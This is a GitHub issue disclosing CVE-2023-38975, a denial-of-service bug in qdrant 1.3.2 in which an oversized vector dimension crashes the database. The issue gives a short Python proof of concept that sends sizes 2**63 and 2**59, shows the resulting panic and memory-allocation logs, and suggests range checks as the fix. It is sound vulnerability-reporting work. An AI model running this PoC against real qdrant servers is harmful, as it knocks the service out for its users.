Headline
CVE-2023-38975: Wrong dim when create collection may cause db service down · Issue #2268 · qdrant/qdrant
- Buffer Overflow vulnerability in qdrant v.1.3.2 allows a remote attacker cause a denial of service via the chucnked_vectors.rs component.
Wrong dim when create collection may cause db service down
Current Behavior
Denial of Service, Users can not use the vector database normally
Steps to Reproduce
some bugs related with the dim of vector when create collection, which can cause DoS
Details
version: 1.3.2
at https://github.com/qdrant/qdrant/blob/master/lib/segment/src/vector_storage/chunked_vectors.rs#L28, it check cannot be 0, but vector_size may be zero if dim too big such as 2**63. Then it will divide zero
if dim is too big, the vector::new will failed on my 128G memory server, and service will down.
PoC
from qdrant_client import QdrantClient
from qdrant_client import models
c = QdrantClient(host="127.0.0.1", port=6333)
c.recreate_collection(
collection_name="test",
vectors_config=models.VectorParams(size=2**63, distance=models.Distance.COSINE),
)
# [2023-05-30T08:25:32.996Z ERROR qdrant::startup] Panic occurred in file lib/segment/src/vector_storage/chunked_vectors.rs at line 28: attempt to divide by zero
c = QdrantClient(host="127.0.0.1", port=6333)
c.recreate_collection(
collection_name="test",
vectors_config={
"payload": models.VectorParams(size=2**59, distance=models.Distance.DOT),
}
)
#memory allocation of 2305843009213693952memory allocation of bytes failed
#2305843009213693952 bytes failed
#Aborted (core dumped)
Possible Solution
check the value range
P.S This bug can also effect the cloud service